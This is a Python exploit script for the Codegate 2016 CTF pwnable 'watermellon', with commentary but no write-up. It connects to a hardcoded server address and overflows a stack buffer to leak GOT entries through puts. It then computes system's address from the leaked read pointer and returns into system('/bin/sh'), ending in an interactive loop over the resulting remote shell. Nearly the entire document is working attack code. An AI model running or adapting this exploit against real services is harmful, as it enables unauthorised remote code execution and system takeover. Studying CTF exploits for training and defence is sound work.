

Codegate 2016 — "watermellon" (pwnable): exploit script only, no write-up

from socket import *

from struct import *

import sys

import time


################################

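def until(s, string):
    """Read from socket ``s`` one byte at a time until ``string`` has been seen.

    Returns everything read, delimiter included.  Reading a single byte per
    call is deliberate: the bytes that follow the delimiter are binary leak
    data that the caller parses itself, so nothing may be read past it.

    Raises EOFError if the peer closes the connection before the delimiter
    arrives.  The original looped forever in that case, because recv()
    returns '' on EOF and '' is appended without ever advancing.
    """
    data = ''
    while string not in data:
        chunk = s.recv(1)
        if not chunk:
            raise EOFError('connection closed before %r was seen' % string)
        data += chunk
    return data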



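def recvAll(s):
    """Print everything the peer sends until it closes the connection.

    Blocks until the peer closes (there is no timeout on the socket), so
    only call this when the server is expected to hang up.  Returns the
    concatenation of every chunk received so the caller can inspect it;
    the original printed the chunks and discarded them.  Not used by the
    exploit below.
    """
    chunks = []
    while True:
        data = s.recv(1024)
        if not data:
            break
        print(data)
        chunks.append(data)
    return ''.join(chunks)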

################################


# 32-bit little-endian helpers: the target is an i386 binary (0x0804xxxx
# text addresses), so every stack slot and GOT entry is one '<L' word.
def p(x):
    return pack('<L', x)


def up(x):
    return unpack('<L', x)


# Local test instance: host = '127.0.0.1', port = 22222.
# The address below was the CTF server at the time; only point this at a
# target you are authorised to attack.
host = '175.119.158.133'
port = 9091

# Presumably a puts-to-system distance for some libc; nothing below uses it.
puts_system = 152780

# Blocking socket with no timeout: a recv() the server never answers hangs
# the script instead of failing.
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, port))

puts_plt = 0x08048560
puts_got = 0x0804C028
pr = 0x080495AF   # presumably a pop/ret gadget; not used below either


# --- Stage 1: leak libc via puts(GOT) ---------------------------------
# Walk the menu: a name, "1" three times, then option 3 with 101.  What
# each choice does is not visible here; 101 is presumably a length larger
# than the destination buffer, since the next write overflows it.
for line in ("ddd", "1", "1", "1", "3", "101"):
    sock.send(line + "\n")
    print(sock.recv(1024))
    print(sock.recv(1024))

main_addr = 0x08049490

# First write: 12 bytes of padding, puts@plt as the return address, and
# main as puts' own return so the program restarts for stage 2.
payload = "A" * 12 + "".join(p(a) for a in (puts_plt, main_addr))
sock.send(payload + "\n")
print(sock.recv(1024))
print(sock.recv(1024))

# Second round of option 3 / size 101: four filler bytes ...
for line in ("3", "101", "AAAA"):
    sock.send(line + "\n")
    print(sock.recv(1024))
    print(sock.recv(1024))

# ... then the pointer puts() will dump: read's GOT slot, the first of the
# consecutive entries that the leak parser below walks in address order.
read_got = 0x0804C00C
payload = p(read_got)
sock.send(payload + "\n")
print(sock.recv(1024))
print(sock.recv(1024))


#################################


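# Option 4 exits; after the "BYE BYE" banner the overwritten return
# address runs puts(read_got), which prints the GOT as one C string.
sock.send("4\n")
print(until(sock, "BYE BYE\n"))
# One byte is read and shown before the 4-byte fields start; presumably a
# separator emitted by the binary -- verify against the server output.
print(sock.recv(1))


def _recv_exact(s, n):
    """Read exactly n bytes from s.

    A single recv(4) may legitimately return fewer bytes (the dump arrives
    as a stream, not as 4-byte records); unpack('<L') on a short read
    raises struct.error and the whole stage is lost.  Raises EOFError if
    the peer closes first.
    """
    buf = ''
    while len(buf) < n:
        chunk = s.recv(n - len(buf))
        if not chunk:
            raise EOFError('connection closed after %d of %d bytes'
                           % (len(buf), n))
        buf += chunk
    return buf


# GOT entries in address order starting at read_got (0x0804C00C).
# puts_got (0x0804C028) is 7 slots later, which matches its index here.
# Caveat: puts() stops at the first NUL byte, so if any leaked pointer
# contains 0x00 the dump is cut short and every later field is misread;
# compare the printed values against the expected libc layout.
got_names = [
    "read", "printf", "fflush", "fgets", "__stack_chk_fail", "_IO_getc",
    "malloc", "puts", "__gmon_start__", "__libc_start_main", "write",
    "setvbuf", "putchar", "__isoc99_scanf",
]
leaked = {}
for name in got_names:
    leaked[name] = up(_recv_exact(sock, 4))[0]
    print(name + " : " + hex(leaked[name]))

read_addr = leaked["read"]
puts_addr = leaked["puts"]   # leaked but unused: system is derived from read

# read - system for the target's libc.  The commented offsets the author
# left (read 0x000db6f0, system 0x000403b0) give 635712, not 648672, so
# they belong to a different libc build; recompute both against the
# libc actually in front of you before reusing this.
read_system = 648672
system_addr = read_addr - read_system

print("read_addr : " + hex(read_addr))
print("system_addr : " + hex(system_addr))

print("STAGE1 END")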


######################################################################################################


# --- Stage 2: same overflow, now returning into system("/bin/sh") -----
# The name is "/bin/sh" this round.  binsh_addr below (0x0804D7A0, inside
# the binary's writable data) is presumably where that name input ends up
# stored -- confirm in the binary before reusing.
for line in ("/bin/sh", "1", "1", "1", "3", "101"):
    sock.send(line + "\n")
    print(sock.recv(1024))
    print(sock.recv(1024))

# First write is pure filler this time (12 bytes padding + two slots) ...
payload = "A" * 12 + "AAAA" * 2
sock.send(payload + "\n")
print(sock.recv(1024))
print(sock.recv(1024))

# ... and so is the second ...
for line in ("3", "101"):
    sock.send(line + "\n")
    print(sock.recv(1024))
    print(sock.recv(1024))

binsh_addr = 0x0804D7A0

payload = "AAAA" * 3
sock.send(payload + "\n")
print(sock.recv(1024))
print(sock.recv(1024))

# ... while the last one carries the chain: system from the stage-1 leak,
# an address inside the binary as system's return, and the "/bin/sh"
# pointer as its argument.  No reply is read here; option 4 triggers it.
view_addr = 0x080496f9

payload = "".join(p(a) for a in (system_addr, view_addr, binsh_addr))
sock.send(payload + "\n")


#################################


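# Option 4 exits again; this time the overwritten return runs
# system("/bin/sh"), so after the banner the socket is a shell.
sock.send("4\n")
print(until(sock, "BYE BYE\n"))
print(sock.recv(1024))

# Minimal interactive loop.  Each command gets exactly one recv(), so
# output longer than 1024 bytes (or arriving in several segments) shows
# up on the next prompt.  Stop cleanly on EOF from the user (Ctrl-D) or
# from the peer; the original raised EOFError on the former and printed
# empty strings forever on the latter.
while True:
    try:
        cmd = raw_input('$ ')
    except EOFError:
        break
    sock.send(cmd + "\n")
    reply = sock.recv(1024)
    if not reply:
        print("[connection closed by peer]")
        break
    print(reply)
sock.close()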


